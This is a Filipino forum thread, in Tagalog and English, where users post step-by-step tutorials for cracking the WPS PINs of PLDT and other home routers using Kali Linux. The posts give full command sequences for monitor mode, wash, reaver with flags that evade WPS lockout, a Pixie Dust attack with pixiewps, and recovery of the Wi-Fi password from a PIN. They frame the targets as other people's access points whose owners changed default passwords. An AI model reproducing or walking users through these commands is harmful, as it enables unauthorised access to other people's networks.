Symbianize Forum

Most of our features and services are available only to members, so we encourage you to login or register a new account. Registration is free, fast and simple. You only need to provide a valid email. Being a member you'll gain access to all member forums and features, post a message to ask question or provide answer, and share or find resources related to mobile phones, tablets, computers, game consoles, and multimedia.

All that and more, so what are you waiting for, click the register button and join us now! Ito ang website na ginawa ng pinoy para sa pinoy!

I need help WPS LOCKED [PLDT Routers]

Was this Effective?


  • Total voters
    14
Eto na pala Solusyon para hindi mag-WPS Lockout yung Target AP na hinahack nyu...Complete Tut na para marami makinabang,...
Step1: iwconfig >> check mo muna inteface name ng Adapter at kung nasa Monitor Mode na ito...
Step2: airmon-ng start wlan1 >> put wifi adapter in Monitor mode ( note change wlan1 into ur interface name)
Step3: kill 1156 >> (Optional) kill mo yung mag interfering process kung merong sagabal (1156 for example sa ken etc. lahat dapat patayin)
Step4 airmon-ng start wlan1 >> pagahin ulet si airmon-ng para makita yung interface name nya in monitor mode (ex. saken wlan1mon )
Step5: wash -i wlan1mon >> para ma-filter lang yung Target AP na may WPS (Note: paltan yung wlan1mon sa interface name mo. Ex. mon0 etc..)
Step6: CTRL+C pag nakita muna na Target AP mo ( Note: wag na tirahin yung AP na may column Lck : Yes.. mahihirpan ka)
Step7: Open New Terminal reaver -i wlan1mon -c 1 -b 90:61:0C:2E:A7:CE -vv -L -N -d 15 -T .5 -r 3:15 at paganahin si reaver
legend:
wlan1mon is the name of the wireless adapter in monitor mode.
--b 90:61:0C:2E:A7:CE is the BSSID of the vulnerable AP.
-c 1 is the channel the of theTarget AP.
-L Ignore locked WPS state.
-N Don’t send NACK packets when errors are detected.
-d 15 Delay 15 seconds between PIN attempts.
-T Set timeout period to half a second.
-r 3:15 After 3 attempts, sleep for 15 seconds
Within 10-20 minutes...lalabas na WPS PIN kung tama lahat code mo..TIYAGA lang dapat mga TS

Managed mo na ulet WIFI para maka-net ka sa KALI LINUX:
sudo service network-manager restart
airmon-ng stop wlan1mon (Note: paltan yung wlan1mon sa interface name mo)

dito mo i-enter yung nakuha mong WPS PIN (see Image) at kung wala kang ganyan pwede yung JUMPSTART sa Windows.
basa ka na sa comment ko d2 (complete TUT yan)

etnad2raray.jpg
 
Last edited:
mga ka symb. tanong ko lang po and hingi narin ng tip kung natry nyo na ma hack ang bagong router ng pldt ngayon, lalo na yung pldt fibr. pero zyxel parin nmn routers nila diba?

1. i tried pixiewps but hindi working since nag lolock siya. and kung maka associate man siya, hindi siya nag bibigay ng E-Hashes(public keys) pero the rest binibigay niya like e and r nonce pati authentication keys, wala lang talaga yung E-hashes. :pray::pray::pray:

2. same din sa reaver and eapol attack( i tried injecting decent amount of packets, from two different wifi adapters mga 500-1000 packets/s sa AP pero hindi siya nagrerestart. :pray::pray::pray:

using kali linux latest update.


ps. alam ko po yung default password pattern.. para po to sa mga nagpalit ng default passowrd. :praise::praise::praise:




Nagawan ko na ng paraan, tinest ko din po sa ibang Access point like Skybroadband and Globe Aztech routers working din po siya... heres what i did. Using Pixiedust at Reaver..

Mga kailangan po muna.

1. Wireless adapter na pwede makapag monitor ng wifi traffic kahit hindi connected sa isang network
-Hanap nalang po tayo ng mga Wireless adapter, meron po dito marami search lang po sa ibang thread, lalo na sa Hardware Section ng forums natin.

2. Kali Linux. with latest updates syempre
-para po mag update ang OS natin open lang po tayo ng Terminal window then type:

apt-get update
apt-get upgrade
apt-get dist-upgrade


Steps

1. Open po tayo ng Terminal window (eto po yung CUI (command user interface ng kali linux)).
2. enter: airmon-ng
check po muna natin kung anong pangalan ng interface natin. madalas "wlan0" or "mon0" pero sa bagong labas na kali "wlan0mon" siya. pero to make sure check nalang natin. sa case natin "wlan0" siya nakalagay.
3. enter: iwconfig wlan0
check muna natin kung naka monitor mode ba siya. if naka monitor mode na then skip po natin to.
3.2 if hindi siya naka monitor mode enter the following: nasa baba may pic.
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

3.3 iwconfig to check if nalipat na siya sa monitor mode.

4. enter: airodump-ng wlan0
to show the list of access points.
5. hit "ctrl+c" if may nahanap na tayong target. wag po natin e close tong window na to. take note of the BSSID and CHANNEL ng Target natin
6. open a new terminal window.
7. enter: reaver -i wlan0 -b XX:XX:XX:XX:XX:XX -c X -vv -K 1
-paki palitan po si variable "x" ng bssid at channel ng target access point natin. or copy nyo nalang mula sa kabila terminal window.
8. then we wait... kailangan natin ang:
PKE, PKR, e-hash 1 & e-hash 2, E-nonce / R-nonce and the authkey from Reaver para sa pixiewps.

9. once nahanap na natin ang mga kailangan natin. pwede na natin gamitin ang pixiewps tool. may pic sa baba

10.enter: pixiewps
at paki sundan ang format sa paglalagay ng mga PKE, PKR, e-hash 1 & e-hash 2, E-nonce / R-nonce at authkey

pixiewps -e [paki paste dito ang PKE] -r [d2 PKR] -s [d2 E-hash1] -z [d2 E-hash2] -a [authkey here] -n [e-nonnce here] -m [r-nonce here]

Hindi po kasama ang mga bracket

11. if pin lang ang binigay. sa WPS tab ng Ralink natin choose 1.) REGISTRAR sa config mode then 2.) input natin ang PIN sa Pin Code Textbox Last 3.) Click mo yung Pin sa lower left. check picture for reference.

View attachment 1066914
View attachment 1066915
View attachment 1066916
View attachment 1066917
View attachment 1066918
View attachment 1067167

i have the same problem po
 
Reaver can get the PSK of router once you got the WPS pin, all you have to do is:

Code:
#reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 1 -p 06996888 (The last 8 digits is an WPS example)

The PSK returned by Reaver is in numeric format, but you can use it to connect to the router.
 
Back
Top Bottom